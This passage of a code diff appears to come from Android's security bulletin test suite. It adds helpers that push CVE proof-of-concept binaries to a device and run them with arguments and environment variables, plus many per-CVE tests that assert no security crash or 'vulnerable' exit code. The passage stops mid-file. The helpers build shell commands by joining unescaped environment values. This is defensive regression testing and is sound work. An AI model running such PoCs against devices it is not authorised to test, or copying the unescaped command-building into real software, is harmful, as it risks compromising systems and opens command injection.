+ public static int runPoc(String pocName, ITestDevice device, int timeout,
+ String arguments, Map<String, String> envVars,
+ IShellOutputReceiver receiver) throws Exception {
String remoteFile = String.format("%s%s", TMP_PATH, pocName);
- SecurityTestCase.getPocPusher(device).pushFile(pocName, remoteFile);
+ SecurityTestCase.getPocPusher(device).pushFile(pocName + "_sts", remoteFile);
assertPocExecutable(pocName, device);
if (receiver == null) {
@@ -173,11 +194,26 @@
arguments = "";
}
+ String env = "";
+ if (envVars != null) {
+ StringBuilder sb = new StringBuilder();
+ for (Map.Entry<String, String> entry : envVars.entrySet()) {
+ sb
+ .append(entry.getKey().trim())
+ .append('=')
+ .append(entry.getValue().trim())
+ .append(' ');
+ }
+ env = sb.toString();
+ CLog.i("Running poc '%s' with env variables '%s'", pocName, env);
+ }
+
// since we have to return the exit status AND the poc stdout+stderr we redirect the exit
// status to a file temporarily
String exitStatusFilepath = TMP_PATH + "exit_status";
runCommandLine("rm " + exitStatusFilepath, device); // remove any old exit status
- device.executeShellCommand(TMP_PATH + pocName + " " + arguments +
+ device.executeShellCommand(
+ env + TMP_PATH + pocName + " " + arguments +
"; echo $? > " + exitStatusFilepath, // echo exit status to file
receiver, timeout, TimeUnit.SECONDS, 0);
@@ -411,7 +447,21 @@
*/
public static int runPocGetExitStatus(String pocName, String arguments, ITestDevice device,
int timeout) throws Exception {
- return runPoc(pocName, device, timeout, arguments, null);
+ return runPocGetExitStatus(pocName, arguments, null, device, timeout);
+ }
+
+ /**
+ * Pushes and runs a binary to the device and returns the exit status.
+ * @param pocName name of the poc binary
+ * @param arguments input arguments for the poc
+ * @param envVars run the poc with environment variables
+ * @param device device to be run on
+ * @param timeout time to wait for output in seconds
+ */
+ public static int runPocGetExitStatus(
+ String pocName, String arguments, Map<String, String> envVars,
+ ITestDevice device, int timeout) throws Exception {
+ return runPoc(pocName, device, timeout, arguments, envVars, null);
}
/**
@@ -434,8 +484,22 @@
*/
public static void runPocAssertExitStatusNotVulnerable(String pocName, String arguments,
ITestDevice device, int timeout) throws Exception {
+ runPocGetExitStatus(pocName, arguments, null, device, timeout);
+ }
+
+ /**
+ * Pushes and runs a binary and asserts that the exit status isn't 113: vulnerable.
+ * @param pocName name of the poc binary
+ * @param arguments input arguments for the poc
+ * @param envVars run the poc with environment variables
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ */
+ public static void runPocAssertExitStatusNotVulnerable(
+ String pocName, String arguments, Map<String, String> envVars,
+ ITestDevice device, int timeout) throws Exception {
assertTrue("PoC returned exit status 113: vulnerable",
- runPocGetExitStatus(pocName, arguments, device, timeout) != 113);
+ runPocGetExitStatus(pocName, arguments, envVars, device, timeout) != 113);
}
/**
@@ -445,9 +509,24 @@
* @param device device to be ran on
*/
public static int runProxyAutoConfig(String pacName, ITestDevice device) throws Exception {
+ return runProxyAutoConfig(pacName, null, device);
+ }
+
+ /**
+ * Runs the binary against a given proxyautoconfig file, asserting that it doesn't
+ * crash
+ * @param pacName the name of the proxy autoconfig script from the /res folder
+ * @param arguments input arguments for pacrunner
+ * @param device device to be ran on
+ */
+ public static int runProxyAutoConfig(String pacName, String arguments,
+ ITestDevice device) throws Exception {
pacName += ".pac";
String targetPath = TMP_PATH + pacName;
AdbUtils.pushResource("/" + pacName, targetPath, device);
+ if(arguments != null) {
+ targetPath += " " + arguments;
+ }
runPocAssertNoCrashes(
"pacrunner", device, targetPath,
new CrashUtils.Config().setProcessPatterns("pacrunner"));
@@ -564,8 +643,33 @@
public static void runPocAssertNoCrashesNotVulnerable(String binaryName, String arguments,
String inputFiles[], String inputFilesDestination, ITestDevice device,
String processPatternStrings[]) throws Exception {
+ runPocAssertNoCrashesNotVulnerable(binaryName, arguments, null,
+ inputFiles, inputFilesDestination, device, processPatternStrings);
+ }
+
+ /**
+ * Runs the poc binary and asserts following 3 conditions.
+ * 1. There are no security crashes in the binary.
+ * 2. There are no security crashes that match the expected process pattern.
+ * 3. The exit status isn't 113 (Code 113 is used to indicate the vulnerability condition).
+ *
+ * @param binaryName name of the binary
+ * @param arguments arguments for running the binary
+ * @param envVars run the poc with environment variables
+ * @param inputFiles files required as input
+ * @param inputFilesDestination destination directory to which input files are
+ * pushed
+ * @param device device to be run on
+ * @param processPatternStrings a Pattern string (other than binary name) to match the crash
+ * tombstone process
+ */
+ public static void runPocAssertNoCrashesNotVulnerable(
+ String binaryName, String arguments, Map<String, String> envVars,
+ String inputFiles[], String inputFilesDestination, ITestDevice device,
+ String... processPatternStrings) throws Exception {
pocConfig testConfig = new pocConfig(binaryName, device);
testConfig.arguments = arguments;
+ testConfig.envVars = envVars;
if (inputFiles != null) {
testConfig.inputFiles = Arrays.asList(inputFiles);
@@ -602,7 +706,7 @@
runCommandLine("logcat -c", testConfig.device);
try {
runPocAssertExitStatusNotVulnerable(testConfig.binaryName, testConfig.arguments,
- testConfig.device, TIMEOUT_SEC);
+ testConfig.envVars, testConfig.device, TIMEOUT_SEC);
} catch (IllegalArgumentException e) {
/*
* Since 'runPocGetExitStatus' method raises IllegalArgumentException upon
@@ -671,5 +775,9 @@
} catch (JSONException e) {}
}
fail(error.toString());
- }
+ }
+
+ public static void assumeHasNfc(ITestDevice device) throws DeviceNotAvailableException {
+ assumeTrue("nfc not available on device", device.hasFeature("android.hardware.nfc"));
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java
new file mode 100644
index 0000000..e6e1015
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.compatibility.common.util.CrashUtils;
+import static org.junit.Assume.assumeFalse;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2016_2182 extends SecurityTestCase {
+
+ /**
+ * b/32096880
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2017-03")
+ @Test
+ public void testPocCVE_2016_2182() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.conscrypt"));
+ String binaryName = "CVE-2016-2182";
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.checkMinAddress(false);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java
new file mode 100644
index 0000000..9d032cd
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2016_8332 extends SecurityTestCase {
+
+ /**
+ * b/37761553
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2017-06")
+ @Test
+ public void testPocCVE_2016_8332() throws Exception {
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2016-8332", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java
new file mode 100644
index 0000000..4dd4b39
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2017_0684 extends SecurityTestCase {
+
+ /**
+ * b/35421151
+ * Vulnerability Behaviour: SIGSEGV in media.codec
+ */
+ @SecurityTest(minPatchLevel = "2017-07")
+ @Test
+ public void testPocCVE_2017_0684() throws Exception {
+ pocPusher.only32();
+ String errPattern[] = {"media\\.codec", "omx@\\d+?\\.\\d+?-service"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-0684", null, getDevice(),
+ errPattern);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java
new file mode 100644
index 0000000..5a17589
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2017_0726 extends SecurityTestCase {
+
+ /**
+ * b/36389123
+ * Vulnerability Behaviour: EXIT_VULNERABLE (113)
+ */
+ @SecurityTest(minPatchLevel = "2017-08")
+ @Test
+ public void testPocCVE_2017_0726() throws Exception {
+ pocPusher.only64();
+ String inputFiles[] = {"cve_2017_0726.mp4"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-0726",
+ AdbUtils.TMP_PATH + inputFiles[0], inputFiles, AdbUtils.TMP_PATH, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java
new file mode 100644
index 0000000..ab83ce3
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import static org.junit.Assert.*;
+import static org.junit.Assume.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2017_13194 extends SecurityTestCase {
+
+ /**
+ * b/64710201
+ * Vulnerability Behaviour: SIGSEGV in media.codec
+ */
+ @SecurityTest(minPatchLevel = "2018-01")
+ @Test
+ public void testPocCVE_2017_13194() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.media.swcodec"));
+ pocPusher.only64();
+ String processPatternStrings[] = {"media\\.codec", "omx@\\d+?\\.\\d+?-service"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-13194", null, getDevice(),
+ processPatternStrings);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java
new file mode 100644
index 0000000..6f1c03f
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9558 extends SecurityTestCase {
+
+ /**
+ * b/112161557
+ * Vulnerability Behaviour: SIGABRT in self
+ */
+ @SecurityTest(minPatchLevel = "2018-12")
+ @Test
+ public void testPocCVE_2018_9558() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ String binaryName = "CVE-2018-9558";
+ String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.setSignals(signals);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java
new file mode 100644
index 0000000..ad88bb7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9561 extends SecurityTestCase {
+
+ /**
+ * b/111660010
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2018_9561() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9561", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java
new file mode 100644
index 0000000..8f8b53d
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9563 extends SecurityTestCase {
+
+ /**
+ * b/114237888
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2018_9563() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9563", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java
new file mode 100644
index 0000000..5d68ce6
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9584 extends SecurityTestCase {
+
+ /**
+ * b/114047681
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-01")
+ @Test
+ public void testPocCVE_2018_9584() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9584", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java
new file mode 100644
index 0000000..f5d19e4
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9585 extends SecurityTestCase {
+
+ /**
+ * b/117554809
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-01")
+ @Test
+ public void testPocCVE_2018_9585() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9585", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java
new file mode 100644
index 0000000..718878c
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2007 extends SecurityTestCase {
+
+ /**
+ * b/120789744
+ * Vulnerability Behaviour: EXIT_VULNERABLE (113)
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2019_2007() throws Exception {
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2007", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java
new file mode 100644
index 0000000..d2f60c7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2013 extends SecurityTestCase {
+
+ /**
+ * b/120497583
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2019_2013() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2013", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java
new file mode 100644
index 0000000..c70f560
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2014 extends SecurityTestCase {
+
+ /**
+ * b/120499324
+ * Vulnerability Behaviour: SIGABRT in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2019_2014() throws Exception {
+ pocPusher.only64();
+ String binaryName = "CVE-2019-2014";
+ String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.setSignals(signals);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java
new file mode 100644
index 0000000..cd61170
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2019 extends SecurityTestCase {
+
+ /**
+ * b/115635871
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2019_2019() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2019", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java
new file mode 100644
index 0000000..0ac90e4
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2035 extends SecurityTestCase {
+
+ /**
+ * b/122320256
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-04")
+ @Test
+ public void testPocCVE_2019_2035() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2035", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java
new file mode 100644
index 0000000..2619ed9
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
